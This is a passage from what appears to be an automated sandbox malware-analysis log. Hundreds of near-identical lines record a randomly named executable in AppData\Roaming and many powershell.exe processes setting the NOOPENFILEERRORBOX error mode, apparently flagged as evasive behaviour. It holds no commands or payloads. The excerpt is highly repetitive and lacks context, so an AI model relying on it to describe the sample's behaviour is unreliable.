                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
